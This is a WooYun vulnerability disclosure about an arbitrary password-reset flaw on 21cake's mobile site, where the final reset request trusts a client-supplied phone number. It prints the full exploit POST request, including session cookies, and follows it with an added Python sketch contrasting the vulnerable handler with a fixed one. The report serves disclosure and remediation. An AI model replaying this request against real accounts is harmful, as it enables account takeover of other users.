Vulnerability summary
Defect ID: wooyun-2015-0136921
Title: Arbitrary password reset on a 21cake (廿一客) sub-site
Vendor: 21cake (廿一客食品有限公司)
Author: Vinc
Submitted: 2015-08-25 21:13
Fix deadline: 2015-08-30 21:14
Published: 2015-08-30 21:14
Type: design flaw / logic error
Severity: High
Self-assessed rank: 15
Status: vendor was notified but ignored the vulnerability
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-08-25: details sent to the vendor, awaiting vendor handling
2015-08-30: vendor chose to ignore the vulnerability; details disclosed to the public
Brief description:
:)
Detailed description:
Domain:
m.21cake.com
In the final step of the password-reset flow, the POST body is as follows:
=0&mobile=13888888888&pam_account%5Blogin_password%5D=123456&pam_account%5Bpsw_confirm%5D=123456
Changing 13888888888 to another mobile number resets that account's password: the final step takes the target account from the client-supplied mobile field rather than from the number that was verified by the earlier SMS-code step.
The full POST request:
POST /passport-resetpasswordbymob.html HTTP/1.1
Host: m.21cake.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://m.21cake.com/passport-resetmob_code1.html
Content-Length: 96
Cookie: sale_city=%257B%2522id%2522%253A%25222%2522%252C%2522name%2522%253A%2522%25E5%258C%2597%25E4%25BA%25AC%2522%252C%2522region_id%2522%253A2%252C%2522first%2522%253A%2522ok%2522%257D; Hm_lvt_c4f4185f92223489c0fd9389a449ae9c=1440501806; Hm_lpvt_c4f4185f92223489c0fd9389a449ae9c=1440501826; OZ_1U_2141=vid=v5dc502ea6ad32.0&ctime=1440501826<ime=1440501805; OZ_1Y_2141=erefer=-&eurl=http%3A//www.21cake.com/&etime=1440501805&ctime=1440501826<ime=1440501805&compid=2141; __utma=24451449.1272394634.1440501806.1440501806.1440501806.1; __utmb=24451449.2.10.1440501806; __utmc=24451449; __utmz=24451449.1440501806.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; _jzqa=1.1585776530674180400.1440501806.1440501806.1440501806.1; _jzqb=1.2.10.1440501806.1; _jzqc=1; _jzqckmp=1; __xsptplus90=90.1.1440501805.1440501826.2%234%7C%7C%7C%7C%7C%23%23UCBLMkCNnjk-NRBM-AHGRfgDLj-fvBo7%23; vary=0eb5f3136d657c41f04381bca2046b6038cb5798ddcaefc69a15378790489414; SERVERID=c663ce0bc049a06b6eda9565bb1a3436|1440502073|1440501861; Hm_lvt_ea7ddf915b0403f14eb1517f294548a8=1440501862; Hm_lpvt_ea7ddf915b0403f14eb1517f294548a8=1440502072; __utma=76726601.758850462.1440501862.1440501862.1440501862.1; __utmb=76726601.12.10.1440501862; __utmc=76726601; __utmz=76726601.1440501862.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OZ_1U_2167=vid=v5dc506696442a.0&ctime=1440502072<ime=1440502057; OZ_1Y_2167=erefer=-&eurl=http%3A//m.21cake.com/&etime=1440501862&ctime=1440502072<ime=1440502057&compid=2167; s=6ad724bc7f7560ed9bad9cab98649157; S[CART_NUMBER]=0; S[CART_COUNT]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
=0&mobile=13888888888&pam_account%5Blogin_password%5D=123456&pam_account%5Bpsw_confirm%5D=123456
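The flaw and its fix side by side, as an added illustration that is not 21cake's code: the vulnerable handler picks the account from the POST's own mobile field, while the hardened handler takes it from server-side state written when the SMS code was verified and consumes that state so it cannot be replayed. Store names, the session layout and the phone numbers other than the one in the report are constructed assumptions.

```python
import secrets
from urllib.parse import parse_qs

# Constructed in-memory stand-ins for the site's user table and session backend
# (assumed structure, not the real application). 13900000000 is a constructed number.
USERS = {"13888888888": {"password": "own-old"}, "13900000000": {"password": "other-old"}}
SESSIONS = {}

def verify_sms_code(session_id, mobile, code, expected_code):
    """Preceding step: on a correct SMS code, bind the verified mobile to the server-side
    session. Only this binding, never a later form field, may choose the account."""
    if not secrets.compare_digest(code, expected_code):
        return False
    SESSIONS[session_id] = {"verified_mobile": mobile}
    return True

def reset_vulnerable(body):
    """Mirrors the reported design: the final POST's 'mobile' field selects the account."""
    form = parse_qs(body)                       # decodes pam_account%5B...%5D keys
    mobile = form["mobile"][0]
    new_pw = form["pam_account[login_password]"][0]
    if new_pw != form["pam_account[psw_confirm]"][0] or mobile not in USERS:
        return False
    USERS[mobile]["password"] = new_pw          # whatever number the client typed
    return True

def reset_fixed(session_id, body):
    """Hardened form: account comes from the verified session state, the client-supplied
    mobile is ignored, and the state is popped so one verification allows one reset."""
    form = parse_qs(body)
    state = SESSIONS.pop(session_id, None)
    if state is None:
        return False                            # no verified step behind this request
    new_pw = form.get("pam_account[login_password]", [""])[0]
    if not new_pw or new_pw != form.get("pam_account[psw_confirm]", [""])[0]:
        return False
    USERS[state["verified_mobile"]]["password"] = new_pw
    return True

def demo():
    """Constructed scenario: the requester verified only their own number, then submits
    a different number in the final POST, exactly as the report describes."""
    own, other = "13888888888", "13900000000"
    body = (f"=0&mobile={other}&pam_account%5Blogin_password%5D=123456"
            "&pam_account%5Bpsw_confirm%5D=123456")
    verify_sms_code("sess-1", own, "4321", "4321")
    vuln_hit = bool(reset_vulnerable(body) and USERS[other]["password"] == "123456")
    USERS[other]["password"] = "other-old"      # restore before running the fixed path
    fixed_ok = reset_fixed("sess-1", body)
    return {"vulnerable_reset_other": vuln_hit,
            "fixed_touched_other": USERS[other]["password"] == "123456",
            "fixed_changed_own": bool(fixed_ok and USERS[own]["password"] == "123456"),
            "fixed_replay_rejected": not reset_fixed("sess-1", body)}
```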
Proof of vulnerability:
Suggested fix:
:)
Copyright notice: please credit Vinc@WooYun (乌云) when reposting.
Vulnerability response
Vendor response:
Severity: no impact, vendor ignored
Ignored at: 2015-08-30 21:14
Vendor reply:
Vulnerability rank: 4 (WooYun rating)
Latest status:
None yet